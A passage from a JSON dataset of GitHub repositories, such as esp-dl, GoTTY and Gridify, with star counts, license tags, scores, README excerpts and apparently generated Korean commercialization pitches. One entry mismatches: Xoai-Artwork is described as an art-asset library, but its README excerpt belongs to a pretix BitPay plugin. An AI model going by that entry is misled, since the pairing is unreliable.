engineers.\n* [jwiegley/category-theory](https://github.com/jwiegley/category-theory) - An axiom-free formalization of category theory in Coq for personal study and practical work\n* [math-comp/math-comp](https://github.com/math-comp/math-comp) - Mathematical Components\n* [uwplse/verdi](https://github.com/uwplse/verdi) - A framework for formally verifying distributed systems implementatio","composite_score":0.011,"license_safety_tag":"unknown"},{"name":"espressif/esp-dl","github_url":"https://github.com/espressif/esp-dl","stars":7,"language":"Assembly","license":"MIT","abandonment_months":0,"description":"# ESP-DL 저장소 분석\n\n## 왜 보물인가\n스마트폰이나 카메라에서 AI 기술을 작동시키는 작은 칩에 특화된 도구 모음으로, 비용이 저렴한 기기에서도 인공지능을 구동할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 기업의 내부 도구**: 저렴한 IoT 센서에 AI 기능을 탑재하여 가정용 카메라나 스피커를 더 똑똑하게 만드는 개발 플랫폼","readme_excerpt":"# ESP-DL [[中文]](./README_cn.md)\n\n[![Documentation Status](./docs/_static/doc_latest.svg)](https://docs.espressif.com/projects/esp-dl/en/latest/index.html)  [![Component Registry](https://components.espressif.com/components/espressif/esp-dl/badge.svg)](https://components.espressif.com/components/espressif/esp-dl)\n\nESP-DL is a lightweight and efficient neural network inference framework designed specifically for ESP series chips. With ESP-DL, you can easily and quickly develop AI applications using Espressif's System on Chips (SoCs).\n\n## Overview\n\nESP-DL offers APIs to load, debug, and run AI models. The framework is easy to use and can be seamlessly integrated with other Espressif SDKs. ESP-PPQ serves as the quantization tool for ESP-DL, capable of quantizing models from ONNX, Pytorch, and TensorFlow, and exporting them into the ESP-DL standard model format.\n\n- **ESP-DL Standard Model Format**: This format is similar to ONNX but uses FlatBuffers instead of Protobuf, making it more light","composite_score":0.011,"license_safety_tag":"safe"},{"name":"sorenisanerd/gotty","github_url":"https://github.com/sorenisanerd/gotty","stars":150,"language":"Go","license":"MIT","abandonment_months":0,"description":"# GoTTY 분석 보고서\n\n## 왜 보물인가\n웹 브라우저에서 컴퓨터 터미널(검은 화면)을 직접 조작할 수 있는 도구로, 복잡한 설치 없이 누구나 어디서나 서버를 관리할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 원격 서버 관리 SaaS**\n클라우드 서비스 회사들이 고객에게 자신의 서버를 웹에서 바로 조작하게 해주는 서비스로 판매 가능합니다.","readme_excerpt":"# ![](https://raw.githubusercontent.com/sorenisanerd/gotty/master/resources/favicon.ico) GoTTY - Share your terminal as a web application\n<!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section -->\n[![All Contributors](https://img.shields.io/badge/all_contributors-80-orange.svg?style=flat-square)](#contributors-)\n<!-- ALL-CONTRIBUTORS-BADGE:END -->\n\n[![GitHub release](http://img.shields.io/github/release/sorenisanerd/gotty.svg?style=flat-square)][release]\n[![MIT License](http://img.shields.io/badge/license-MIT-blue.svg?style=flat-square)][license]\n[![Maintainer streaming](https://twitch-status.soren.tools/sorencodes)][twitch]\n\n[release]: https://github.com/sorenisanerd/gotty/releases\n[license]: https://github.com/sorenisanerd/gotty/blob/master/LICENSE\n[twitch]: https://twitch.tv/sorencodes\n\nGoTTY is a simple command line tool that turns your CLI tools into web applications.\n\n[Original work](https://github.com/yudai/gotty) by [Iwasaki Yudai](https://github.com/yudai). T","composite_score":0.011,"license_safety_tag":"safe"},{"name":"dwallet-labs/ika","github_url":"https://github.com/dwallet-labs/ika","stars":203,"language":"Rust","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.011,"license_safety_tag":"unknown"},{"name":"Kotlin/kmm-production-sample","github_url":"https://github.com/Kotlin/kmm-production-sample","stars":7,"language":"Kotlin","license":"MIT","abandonment_months":0,"description":"# Kotlin/kmm-production-sample 분석\n\n## 왜 보물인가\niOS와 안드로이드 앱을 동시에 만들 때 중복 작업을 줄이는 실제 운영 사례를 보여주는 드문 참고자료입니다.\n\n## 어디에 쓸 수 있나\n1. **금융 앱 개발사**: iOS/안드로이드 모두에서 같은 거래 처리 로직을 한 번에 개발하고 관리\n2. **의료 기록 서비스**: 플랫폼","readme_excerpt":"[![official project](http://jb.gg/badges/official.svg)](https://confluence.jetbrains.com/display/ALL/JetBrains+on+GitHub)\n\n# KMP RSS Reader\n\n<img src=\"/media/ios+android.png\"/>  \n\nThis is an open-source cross-platform application built\nwith [Kotlin Multiplatform](https://kotlinlang.org/multiplatform/).\n\n<img src=\"/media/desktop+web.png\"/>\n\n## Project structure\n\nThis repository contains a common Kotlin Multiplatform module, an Android project, an iOS project, and a desktop project.\nThe common module is connected with the Android project via the Gradle multi-project mechanism. \nFor use in iOS applications, the shared module compiles into a framework that is exposed to the Xcode project via the internal integration Gradle task. \nThis framework connects to the Xcode project that builds an iOS application.\n\nYou can achieve the same structure by creating a project with the [KMP project wizard](https://kmp.jetbrains.com/?android=true&ios=true&iosui=compose&desktop=true&includeTests=true)\nor v","composite_score":0.0109,"license_safety_tag":"safe"},{"name":"geerlingguy/ansible-role-go","github_url":"https://github.com/geerlingguy/ansible-role-go","stars":8,"language":"","license":"MIT","abandonment_months":1,"description":"# geerlingguy/ansible-role-go 분석\n\n## 왜 보물인가\n서버 관리 자동화 도구를 쉽게 설치해주는 검증된 코드 모음으로, 기술팀의 반복 작업을 대폭 줄여줄 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **DevOps 자동화 플랫폼 SaaS**: 기업의 서버 설정을 자동으로 해주는 구독형 서비스에 내장\n2. **클라우드 인프라 관리 ","readme_excerpt":"# Ansible Role: Go\n\n[![CI](https://github.com/geerlingguy/ansible-role-go/actions/workflows/ci.yml/badge.svg)](https://github.com/geerlingguy/ansible-role-go/actions/workflows/ci.yml)\n\nAn Ansible Role that installs Go (the language) on Linux.\n\n## Requirements\n\nN/A\n\n## Role Variables\n\nAvailable variables are listed below, along with default values (see `defaults/main.yml`):\n\n    go_version: \"1.17.3\"\n    go_platform: linux\n    go_arch: amd64\n\nVersion, platform, and architecture to use when downloading Go.\n\n    go_tarball: go{{ go_version }}.{{ go_platform }}-{{ go_arch }}.tar.gz\n    go_download_url: https://dl.google.com/go/{{ go_tarball }}\n\nThese two variables are used to build the download URL when installing Go.\n\n    go_checksum: '550f9845451c0c94be679faf116291e7807a8d78b43149f9506c1b15eb89008c'\n\nSHA256 checksum of the Go download. If changing the version, platform, or architecture, you will also need to update this checksum, too.\n\n    go_download_dest: /usr/local/src\n\nDirectory where","composite_score":0.0109,"license_safety_tag":"safe"},{"name":"symfony/polyfill-mbstring","github_url":"https://github.com/symfony/polyfill-mbstring","stars":12,"language":"PHP","license":"mit","abandonment_months":1,"description":"# symfony/polyfill-mbstring 분석\n\n## 왜 보물인가\n전 세계 여러 언어(한글, 중국어, 일본어 등)를 다루는 웹사이트가 안정적으로 작동하도록 보장해주는 필수 기반 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **글로벌 전자상거래 SaaS**: 다국어 상품 설명, 고객 리뷰, 결제 정보를 정확하게 처리하는 해외 판매 플랫폼\n2. **다","readme_excerpt":"Symfony Polyfill / Mbstring\n===========================\n\nThis component provides a partial, native PHP implementation for the\n[Mbstring](https://php.net/mbstring) extension.\n\nMore information can be found in the\n[main Polyfill README](https://github.com/symfony/polyfill/blob/main/README.md).\n\nLicense\n=======\n\nThis library is released under the [MIT license](LICENSE).\n","composite_score":0.0108,"license_safety_tag":"safe"},{"name":"ajbosco/dag-factory","github_url":"https://github.com/ajbosco/dag-factory","stars":8,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# dag-factory 보물 분석\n\n## 왜 보물인가\n복잡한 자동화 작업을 코드 없이 설정파일로 쉽게 만들 수 있도록 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **데이터 처리 자동화 SaaS**: 기업들이 매일 반복되는 데이터 정리 작업을 웹 대시보드에서 클릭으로 자동화할 수 있는 서비스\n2. **내부 업무 자동화 플랫폼**: 회계팀, HR팀","readme_excerpt":"# dag-factory\n\n[![Github Actions](https://github.com/astronomer/dag-factory/actions/workflows/cicd.yaml/badge.svg?branch=main&event=push)](https://github.com/astronomer/dag-factory/actions?workflow=build)\n[![Coverage](https://codecov.io/github/astronomer/dag-factory/coverage.svg?branch=master)](https://codecov.io/github/astronomer/dag-factory?branch=master)\n[![PyPi](https://img.shields.io/pypi/v/dag-factory.svg)](https://pypi.org/project/dag-factory/)\n[![Code Style](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/ambv/black)\n[![Downloads](https://img.shields.io/pypi/dm/dag-factory.svg)](https://img.shields.io/pypi/dm/dag-factory)\n\n<img alt=analytics referrerpolicy=\"no-referrer-when-downgrade\" src=\"https://static.scarf.sh/a.png?x-pxid=2bb92a5b-beb3-48cc-a722-79dda1089eda\" />\n\nWelcome to *dag-factory*! *dag-factory* is a library for [Apache Airflow®](https://airflow.apache.org) to construct DAGs\ndeclaratively via configuration files.\n\nThe minimum requireme","composite_score":0.0108,"license_safety_tag":"safe"},{"name":"EspressoSystems/espresso-network","github_url":"https://github.com/EspressoSystems/espresso-network","stars":190,"language":"Rust","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0108,"license_safety_tag":"unknown"},{"name":"HTTPArchive/almanac.httparchive.org","github_url":"https://github.com/HTTPArchive/almanac.httparchive.org","stars":16,"language":"HTML","license":"Apache-2.0","abandonment_months":0,"description":"# HTTPArchive Almanac 분석\n\n## 왜 보물인가\n전 세계 웹사이트들이 어떻게 만들어지고 있는지를 추적하는 대규모 데이터베이스로, 웹 개발 트렌드와 기술 통계를 한눈에 볼 수 있는 귀중한 자료입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 웹 개발 트렌드 리포트 SaaS**\n- 구독자들이 매월 최신 웹 기술 동향을 시각화된 리포트로 받아보는 서","readme_excerpt":"# 📕 Web Almanac\n\n[![Production Checks GitHub Action](https://github.com/HTTPArchive/almanac.httparchive.org/workflows/Production%20Checks/badge.svg)](https://github.com/HTTPArchive/almanac.httparchive.org/actions?query=workflow%3A%22Production+Checks%22) [![Test Website GitHub Action](https://github.com/HTTPArchive/almanac.httparchive.org/workflows/Test%20Website/badge.svg?branch%3Amain)](https://github.com/HTTPArchive/almanac.httparchive.org/actions?query=workflow%3A%22Test+Website%22+branch%3Amain) [![TLS Observatory](https://img.shields.io/mozilla-observatory/grade-score/almanac.httparchive.org?publish)](https://observatory.mozilla.org/analyze/almanac.httparchive.org)\n\n[![Open Writing Pull Requests](https://img.shields.io/github/issues-pr/HTTPArchive/almanac.httparchive.org/writing)](https://github.com/HTTPArchive/almanac.httparchive.org/pulls?q=is%3Apr+is%3Aopen+label%3Awriting) [![Open Dev Pull Requests](https://img.shields.io/github/issues-pr/HTTPArchive/almanac.httparchive.org/d","composite_score":0.0107,"license_safety_tag":"safe"},{"name":"embassy-rs/stm32-data","github_url":"https://github.com/embassy-rs/stm32-data","stars":131,"language":"Rust","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0106,"license_safety_tag":"unknown"},{"name":"mqttsnet/mqtts","github_url":"https://github.com/mqttsnet/mqtts","stars":5,"language":"Java","license":"NOASSERTION","abandonment_months":0,"description":"# mqttsnet/mqtts 저장소 분석\n\n## 왜 보물인가\n안전한 메시지 전송 기술로 IoT 기기들이 서로 안전하게 소통할 수 있도록 돕는 오픈소스입니다.\n\n## 어디에 쓸 수 있나\n1. **스마트홈 서비스**: 집의 조명, 온도조절기, 보안카메라 등이 안전하게 연결되는 중앙 플랫폼 구축\n2. **산업용 IoT 모니터링**: 공장의 기계들이 실시간으로 ","readme_excerpt":"<div align=\"center\">\n\n<a href=\"https://mqttsnet.com\"><img src=\"./docs/images/logo.png\" alt=\"ThingLinks\" width=\"200\"></a>\n\n# ThingLinks IoT Platform\n\n**Multi-tenant SaaS Cloud IoT Platform — High Performance · High Throughput · Highly Scalable**\n\n[English](README.md) | [简体中文](README.zh-CN.md) | [日本語](README.ja.md) | [한국어](README.ko.md)\n\n[![JDK](https://img.shields.io/badge/JDK-17+-orange?style=flat-square&logo=openjdk)](https://openjdk.org/)\n[![Spring Boot](https://img.shields.io/badge/Spring%20Boot-3.x-green?style=flat-square&logo=springboot)](https://spring.io/projects/spring-boot)\n[![Spring Cloud](https://img.shields.io/badge/Spring%20Cloud-2025-green?style=flat-square&logo=spring)](https://spring.io/projects/spring-cloud)\n[![Vue](https://img.shields.io/badge/Vue-3.x-brightgreen?style=flat-square&logo=vuedotjs)](https://vuejs.org/)\n[![TDengine](https://img.shields.io/badge/TDengine-3.0+-blue?style=flat-square)](https://tdengine.com/)\n[![License](https://img.shields.io/badge/License-A","composite_score":0.0105,"license_safety_tag":"unknown"},{"name":"photonixapp/photonix","github_url":"https://github.com/photonixapp/photonix","stars":7,"language":"Python","license":"AGPL-3.0","abandonment_months":1,"description":"# Photonix 저장소 분석\n\n## 왜 보물인가\n사진을 자동으로 정리하고 찾아주는 개인용 사진 관리 시스템으로, 클라우드 서비스 없이 자신의 컴퓨터에서 완전하게 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 월 구독형 온라인 사진 보관소로 판매 (Google Photos, Amazon Photos 같은 경쟁 서비스 대체)","readme_excerpt":"# Photonix Photo Manager\n\n![GitHub](https://img.shields.io/github/license/photonixapp/photonix) [![Docker Image Version (latest semver)](https://img.shields.io/docker/v/photonixapp/photonix)](https://hub.docker.com/r/photonixapp/photonix/) [![GitHub Sponsors](https://img.shields.io/github/sponsors/photonixapp)](https://github.com/sponsors/photonixapp) [![Docker Pulls](https://img.shields.io/docker/pulls/photonixapp/photonix)](https://hub.docker.com/r/photonixapp/photonix/) [![](https://img.shields.io/travis/damianmoore/photonix/master.svg)](https://travis-ci.org/damianmoore/photonix/branches) [![](https://img.shields.io/codecov/c/github/damianmoore/photonix.svg)](https://codecov.io/gh/damianmoore/photonix) [![](https://img.shields.io/uptimerobot/status/m781745452-4f90c0e2a56b2086dd0c5092.svg?label=demo%20site)](https://demo.photonix.org/) [![](https://img.shields.io/uptimerobot/ratio/m781745452-4f90c0e2a56b2086dd0c5092.svg)](https://demo.photonix.org/)\n\nThis is a photo management appli","composite_score":0.0104,"license_safety_tag":"risky"},{"name":"alirezanet/Gridify","github_url":"https://github.com/alirezanet/Gridify","stars":14,"language":"C#","license":"MIT","abandonment_months":1,"description":"# Gridify 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터를 표 형태로 쉽게 정렬하고 필터링할 수 있는 기술로, 엑셀처럼 직관적인 데이터 관리 경험을 소프트웨어에 구현할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 재무 관리 소프트웨어나 CRM(고객관리 시스템)에 내장하여 사용자가 수천 개의 거래 데이터를 빠르게 검색하고 정렬","readme_excerpt":"# Gridify (A Modern Dynamic LINQ library)\n\n[![GitHub](https://img.shields.io/github/license/alirezanet/gridify)](https://github.com/alirezanet/Gridify/blob/master/LICENSE)\n[![Nuget](https://img.shields.io/nuget/dt/gridify?color=%239100ff)](https://www.nuget.org/packages/Gridify/)\n[![Static Badge](https://img.shields.io/badge/Documentation-42bc00?logo=readme&logoColor=white)](https://alirezanet.github.io/Gridify/)\n[![Static Badge](https://img.shields.io/badge/fuget-f88445?logo=readme&logoColor=white)](https://www.fuget.org/packages/Gridify)\n[![NuGet version (Gridify)](https://img.shields.io/nuget/v/Gridify.svg?style=flat-square&label=stable)](https://www.nuget.org/packages/Gridify/)\n[![NuGet version (Gridify)](https://img.shields.io/nuget/vpre/Gridify.svg?style=flat-square&label=latest&color=yellowgreen)](https://www.nuget.org/packages/Gridify/)\n[![NPM Version](https://img.shields.io/npm/v/gridify-client?label=gridify-client&color=darkcyan)](https://www.npmjs.com/package/gridify-client)","composite_score":0.0104,"license_safety_tag":"safe"},{"name":"fossasia/Xoai-Artwork","github_url":"https://github.com/fossasia/Xoai-Artwork","stars":12,"language":"Python","license":"NOASSERTION","abandonment_months":1,"description":"# Xoai-Artwork 상품화 분석\n\n## 왜 보물인가\nFOSS Asia 커뮤니티가 관리하는 오픈소스 미술 작품 저장소로, 창작자들이 자유롭게 사용할 수 있는 고품질 디지털 자산 라이브러리입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 디자인 스튜디오를 위한 온라인 디자인 소재 구독 플랫폼\n2. **내부 업무 도구**: 대기업 마","readme_excerpt":"BitPay payments\n==========================\n\nThis is a plugin for `pretix`_. \n\nDevelopment setup\n-----------------\n\n1. Make sure that you have a working `pretix development setup`_.\n\n2. Clone this repository, eg to ``local/pretix-bitpay``.\n\n3. Activate the virtual environment you use for pretix development.\n\n4. Execute ``pip install -e .`` within this directory to register this application with pretix's plugin registry.\n\n5. Execute ``make`` within this directory to compile translations.\n\n6. Restart your local pretix server. You can now use the plugin from this repository for your events by enabling it in\n   the 'plugins' tab in the settings.\n\n\nLicense\n-------\n\nCopyright 2018 Raphael Michel\n\nReleased under the terms of the Apache License 2.0\n\n\n.. _pretix: https://github.com/pretix/pretix\n.. _pretix development setup: https://docs.pretix.eu/en/latest/development/setup.html\n","composite_score":0.0104,"license_safety_tag":"unknown"},{"name":"CaffeineMC/lithium-fabric","github_url":"https://github.com/CaffeineMC/lithium-fabric","stars":14,"language":"Java","license":"LGPL-3.0","abandonment_months":0,"description":"# Lithium-Fabric 상용화 분석\n\n## 왜 보물인가\n마인크래프트 게임의 성능을 빠르게 만드는 기술로, 수백만 명의 게이머들이 더 부드러운 게임 경험을 원하기 때문에 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게이밍 SaaS**: 마인크래프트 최적화 프로그램을 월 구독 서비스로 제공하며, 자동 업데이트와 기술 지원 포함\n2. **게임 호","readme_excerpt":"<img src=\"common/src/main/resources/assets/lithium/lithium-icon.png\" width=\"128\">\n\n# Lithium\n\nLithium is a free and open-source Minecraft mod which works to optimize many areas of the game in order to provide\nbetter overall performance. It works on both the **client and server**, and **doesn't require the mod to be installed\non both sides**.\n\n## 📥 Downloads & Installation\n\nDownload Lithium from [Modrinth](https://modrinth.com/mod/lithium) or\n[CurseForge](https://www.curseforge.com/minecraft/mc-mods/lithium).\n\nLithium supports two mod loaders: Fabric and the NeoForge. You can use a launcher\n(e.g. the [Modrinth launcher](https://modrinth.com/app)) to install lithium. Alternatively, you can install lithium\nmanually by placing lithium's jar-file in the `mods` folder of your game after you have installed the\ncorresponding mod loader.\n\n### 📝 Why Choose Lithium?\n\nLithium is the perfect drop-in mod for players who want more performance without affecting their gameplay.\nIt doesn't change any ga","composite_score":0.0101,"license_safety_tag":"restricted"},{"name":"sile-typesetter/sile","github_url":"https://github.com/sile-typesetter/sile","stars":5,"language":"Lua","license":"MIT","abandonment_months":1,"description":"# SILE Typesetter 사업화 분석\n\n## 왜 보물인가\n인쇄 품질의 전문 문서(책, 학술지, 보고서)를 자동으로 만들어주는 오픈소스 도구로, 출판업계에서 매우 비싼 상용 소프트웨어를 대체할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **문서 자동 생성 SaaS**: 기업이 송장, 계약서, 보고서를 업로드하면 전문가 수준의 PDF로 자동 변환해","readme_excerpt":"[![Actions Build Status](https://img.shields.io/github/actions/workflow/status/sile-typesetter/sile/build.yml?branch=master&label=Linux%20Build&logo=Github)](https://github.com/sile-typesetter/sile/actions?workflow=Build)\n[![Cirrus Build Status](https://img.shields.io/cirrus/github/sile-typesetter/sile?label=FreeBSD%20Build&logo=freebsd)](https://cirrus-ci.com/github/sile-typesetter/sile/master)\n[![Docker Build Status](https://img.shields.io/github/actions/workflow/status/sile-typesetter/sile/deploy.yml?branch=master&label=Docker%20Build&logo=Docker)](https://github.com/sile-typesetter/sile/pkgs/container/sile)\n[![Azure Build Status](https://img.shields.io/azure-devops/build/sile-typesetter/069c3e31-ee59-4bd6-b395-1f1059acd8db/1?label=Windows%20Build&logo=Azuredevops)](https://dev.azure.com/sile-typesetter/sile/_build/latest?definitionId=1&branchName=master)<br />\n[![Luacheck Lint Status](https://img.shields.io/github/actions/workflow/status/sile-typesetter/sile/luacheck.yml?branch=mas","composite_score":0.0098,"license_safety_tag":"safe"},{"name":"gmrchk/swup","github_url":"https://github.com/gmrchk/swup","stars":5,"language":"TypeScript","license":"mit","abandonment_months":0,"description":"# gmrchk/swup 분석 보고서\n\n## 왜 보물인가\n웹사이트에서 페이지를 부드럽게 전환하는 경험을 제공하는 도구로, 사용자가 느끼는 웹사이트의 품질을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 디자인 포트폴리오나 크리에이티브 에이전시가 고객에게 보여주는 온라인 포트폴리오 플랫폼에 통합\n- **내부 업무 도구**","readme_excerpt":"<div align=\"center\">\n\n**swup 4 is released  🎉  Check out the [release notes](https://swup.js.org/announcements/swup-4/) and [upgrade guide](https://swup.js.org/getting-started/upgrading/).**\n\n</div>\n\n<br>\n\n<p align=\"center\">\n  <img width=\"280\" alt=\"swup\" src=\"https://swup.js.org/assets/images/swup-logo.svg\">\n</p>\n\n<div align=\"center\">\n\n[![npm version](https://img.shields.io/npm/v/swup.svg)](https://www.npmjs.com/package/swup)\n[![Bundle size](https://img.shields.io/bundlejs/size/swup?exports=default%20as%20Swup&label=size)](https://bundlejs.com/?q=swup&treeshake=%5B%7B+default+%7D%5D)\n[![npm downloads](https://img.shields.io/npm/dt/swup.svg)](https://www.npmjs.com/package/swup)\n[![Test status](https://img.shields.io/github/actions/workflow/status/swup/swup/e2e-tests.yml?branch=main&label=tests)](https://github.com/swup/swup/actions/workflows/e2e-tests.yml)\n[![License](https://img.shields.io/github/license/swup/swup.svg)](https://github.com/swup/swup/blob/main/LICENSE)\n\n</div>\n\n<br>\n\n# S","composite_score":0.0098,"license_safety_tag":"safe"},{"name":"GitGuardian/ggshield-action","github_url":"https://github.com/GitGuardian/ggshield-action","stars":17,"language":"","license":"MIT","abandonment_months":1,"description":"# GitGuardian/ggshield-action 분석\n\n## 왜 보물인가\n회사의 비밀번호나 API 키가 실수로 공개되는 것을 자동으로 감지하고 막아주는 보안 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발팀이 있는 모든 소프트웨어 회사에서 보안 위험을 실시간으로 모니터링하는 구독 서비스\n2. **내부 업무 도구**: 대규모 ","readme_excerpt":"<a href=\"https://gitguardian.com/\"><img src=\"https://cdn.jsdelivr.net/gh/gitguardian/ggshield-action/doc/logo.svg\"></a>\n\n---\n\n# [GitGuardian Shield](https://github.com/GitGuardian/ggshield) GitHub Action\n\n[![GitHub Marketplace](https://img.shields.io/badge/Marketplace-v1-undefined.svg?logo=github&logoColor=white&style=for-the-badge)](https://github.com/marketplace/actions/gitguardian-shield-action)\n[![Docker Image Version (latest semver)](https://img.shields.io/docker/v/gitguardian/ggshield?color=1B2D55&sort=semver&style=for-the-badge&label=ggshield)](https://hub.docker.com/r/gitguardian/ggshield)\n[![License](https://img.shields.io/github/license/GitGuardian/ggshield-action?color=%231B2D55&style=for-the-badge)](LICENSE)\n![GitHub stars](https://img.shields.io/github/stars/gitguardian/ggshield-action?color=%231B2D55&style=for-the-badge)\n\nFind exposed credentials in your commits using [**GitGuardian shield**](https://github.com/GitGuardian/ggshield).\n\nThe **GitGuardian shield** (ggshield)","composite_score":0.0096,"license_safety_tag":"safe"},{"name":"spatie/laravel-health","github_url":"https://github.com/spatie/laravel-health","stars":18,"language":"PHP","license":"MIT","abandonment_months":0,"description":"# spatie/laravel-health 분석 보고서\n\n## 왜 보물인가\n웹사이트나 앱이 제대로 작동하는지 자동으로 감시하고 문제가 생기면 즉시 알려주는 도구입니다.\n\n## 어디에 쓸 수 있나\n**1. SaaS 모니터링 서비스**: 고객의 서버 상태를 실시간으로 체크하고 장애 발생 시 자동 알림  \n**2. 웹호스팅 회사 관리 도구**: 호스팅 업체가 수","readme_excerpt":"<div align=\"left\">\n    <a href=\"https://spatie.be/open-source?utm_source=github&utm_medium=banner&utm_campaign=laravel-health\">\n      <picture>\n        <source media=\"(prefers-color-scheme: dark)\" srcset=\"https://spatie.be/packages/header/laravel-health/html/dark.webp?1\">\n        <img alt=\"Logo for laravel-health\" src=\"https://spatie.be/packages/header/laravel-health/html/light.webp?1\">\n      </picture>\n    </a>\n\n<h1>Check the health of your Laravel app</h1>\n\n[![Latest Version on Packagist](https://img.shields.io/packagist/v/spatie/laravel-health.svg?style=flat-square)](https://packagist.org/packages/spatie/laravel-health)\n[![run-tests](https://github.com/spatie/laravel-health/actions/workflows/run-tests.yml/badge.svg)](https://github.com/spatie/laravel-health/actions/workflows/run-tests.yml)\n[![Check & fix styling](https://github.com/spatie/laravel-health/actions/workflows/pint.yml/badge.svg)](https://github.com/spatie/laravel-health/actions/workflows/pint.yml)\n[![Total Downloads](htt","composite_score":0.0095,"license_safety_tag":"safe"},{"name":"FlorianMarquardt/machine-learning-for-physicists","github_url":"https://github.com/FlorianMarquardt/machine-learning-for-physicists","stars":6,"language":"Jupyter Notebook","license":"unknown","abandonment_months":0,"description":"# FlorianMarquardt/machine-learning-for-physicists 분석\n\n## 왜 보물인가\n물리학 연구자들이 인공지능을 배우고 활용할 수 있도록 만든 교육 자료로, 복잡한 과학 문제를 컴퓨터로 해결하는 방법을 알려줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 대학 물리학과 학생들을 위한 온라인 인공지능 강의 플","readme_excerpt":"# Code for \"Machine Learning for Physicists\" (lecture series by Florian Marquardt)\n\nPlease see the [official course website](https://machine-learning-for-physicists.org/) which has links to the current course where you eventually find links to slides, videos (of the lectures and the tutorials), and summaries of the lecture content. You can find more detailed descriptions of the code there. \n\n<img src=\"Smiley.png\">\n\nNote: All the code **except for the few cases that include code by other people (like tSNE and MNIST; always clearly marked)** is hereby provided under the terms of the MIT license (earlier, this was Attribution-ShareAlike 4.0 International (CC BY-SA 4.0), pick that if you prefer).\n","composite_score":0.0094,"license_safety_tag":"unknown"},{"name":"carloscuesta/gitmoji-cli","github_url":"https://github.com/carloscuesta/gitmoji-cli","stars":10,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# gitmoji-cli 보물 분석\n\n## 왜 보물인가\n개발자들이 코드 변경 내용을 이모지로 쉽게 표시하게 해주는 작은 도구로, 개발 팀의 협업 효율성을 높입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 깃허브 통합 플러그인으로 제공하여 월 구독료 모델로 수익화\n2. **내부 업무 도구**: 대규모 개발팀의 코드 관리 자동화 솔루션으로 ","readme_excerpt":"# gitmoji-cli\n\n[![Build Status](https://img.shields.io/github/actions/workflow/status/carloscuesta/gitmoji-cli/ci.yml?branch=master&style=flat-square)](https://github.com/carloscuesta/gitmoji-cli/actions?query=workflow%3ACI+branch%3Amaster)\n[![Code Climate](https://img.shields.io/codeclimate/maintainability/carloscuesta/gitmoji-cli.svg?style=flat-square)](https://codeclimate.com/github/carloscuesta/gitmoji-cli)\n[![Codecov](https://img.shields.io/codecov/c/github/carloscuesta/gitmoji-cli.svg?style=flat-square)](https://github.com/carloscuesta/gitmoji-cli)\n[![npm version](https://img.shields.io/npm/v/gitmoji-cli.svg?style=flat-square)](https://www.npmjs.com/package/gitmoji-cli)\n[![npm downloads](https://img.shields.io/npm/dt/gitmoji-cli.svg?style=flat-square)](https://www.npmjs.com/package/gitmoji-cli)\n[![gitmoji badge](https://img.shields.io/badge/gitmoji-%20😜%20😍-FFDD67.svg?style=flat-square)](https://github.com/carloscuesta/gitmoji)\n\n![gitmoji-cli](https://cloud.githubusercontent.com/","composite_score":0.0094,"license_safety_tag":"safe"},{"name":"SevenOutman/vue-aplayer","github_url":"https://github.com/SevenOutman/vue-aplayer","stars":7,"language":"Vue","license":"MIT","abandonment_months":0,"description":"# vue-aplayer 상업화 분석\n\n## 왜 보물인가\n웹사이트나 앱에 음악 재생 기능을 간단하게 추가할 수 있는 도구로, 개발자들이 처음부터 다시 만들 필요 없이 바로 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 팟캐스트/음악 스트리밍 플랫폼이 자신의 웹사이트에 내장 플레이어로 활용\n2. **내부 업무 도구**: 회사 ","readme_excerpt":"<p align=\"center\">\n<img src=\"https://github.com/SevenOutman/vue-aplayer/blob/develop/src/assets/vue-aplayer-round.png\" alt=\"Vue-APlayer\" width=\"100\">\n</p>\n<h1 align=\"center\">Vue-APlayer</h1>\n\n## Please refer to [**Future of vue-aplayer**](https://github.com/SevenOutman/vue-aplayer/discussions/236) before you continue.\n\nVue implementation of [APlayer](https://github.com/MoePlayer/APlayer) prototype.\n[**Demo**](https://sevenoutman.github.io/vue-aplayer)\n\n\n[![Travis](https://img.shields.io/travis/SevenOutman/vue-aplayer.svg?style=flat-square)](https://travis-ci.org/SevenOutman/vue-aplayer)\n[![npm](https://img.shields.io/npm/v/vue-aplayer.svg?style=flat-square)](https://www.npmjs.com/package/vue-aplayer)\n[![npm](https://img.shields.io/npm/dt/vue-aplayer.svg?style=flat-square)](https://www.npmjs.com/package/vue-aplayer)\n[![devDependency Status](https://img.shields.io/david/dev/SevenOutman/vue-aplayer.svg?style=flat-square)](https://david-dm.org/SevenOutman/vue-aplayer#info=devDependencies)\n","composite_score":0.0094,"license_safety_tag":"safe"},{"name":"nickjj/docker-rails-example","github_url":"https://github.com/nickjj/docker-rails-example","stars":15,"language":"Ruby","license":"MIT","abandonment_months":0,"description":"# docker-rails-example 분석\n\n## 왜 보물인가\n웹 애플리케이션을 빠르고 안전하게 배포하는 가장 현대적인 방식을 실전 예제로 배울 수 있는 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 프로젝트 관리 도구나 